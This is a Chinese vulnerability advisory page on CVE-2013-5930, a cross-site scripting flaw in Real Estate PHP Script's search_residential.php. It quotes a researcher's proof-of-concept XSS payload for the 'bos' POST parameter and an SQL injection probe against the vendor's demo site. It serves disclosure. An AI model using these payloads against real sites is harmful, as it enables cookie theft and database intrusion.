首页 -> 安全研究
安全研究
安全漏洞
Real Estate PHP search_residential.php跨站脚本漏洞
发布日期:2013-09-23
更新日期:2013-10-07
受影响系统:
Real Estate PHP Script Real Estate PHP Script描述:
CVE(CAN) ID: CVE-2013-5930
Real Estate PHP Script是不动产门户开发解决方案。
Real Estate PHP Script的search_residential.php在实现上存在跨站脚本漏洞,这可使远程攻击者通过bos参数注入任意Web脚本或HTML。
<*来源:Lazmania61
链接:http://xforce.iss.net/xforce/xfdb/86986
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Real Estate Php Script
# Vulnerable Type : Post Cross Site Scripting
# Infection : Yönetici ve User cookie’leri çalynabilir.
# Bug Fix Advice : Zararly karakterler filtrelenmelidir.
# Author : Lazmania61 | Bug Researchers
# Example : http://real-estate-php-script.com/demo/search_residential.php
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
Post Parameter Name = bos
Post Parameter Value = "><script>alert(document.cookie)</script>
< -- bug code end of -- >
**********************SqL Injection*******************
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Real Estate Php Script
# Vulnerable Type : SqL Injection
# Infection : Yönetici ve User cookie’leri çalynabilir.
# Bug Fix Advice : Zararly karakterler filtrelenmelidir.
# Author : Lazmania61 | Bug Researchers
# Example : http://real-estate-php-script.com/demo/property_listings_detail.php?listingid=8499
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
http://real-estate-php-script.com/demo/property_listings_detail.php?listingid=8499’a
< -- bug code end of -- >
建议:
厂商补丁:
Real Estate PHP Script
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://real-estate-php-script.com/
浏览次数:3149
严重程度:0(网友投票)
绿盟科技给您安全的保障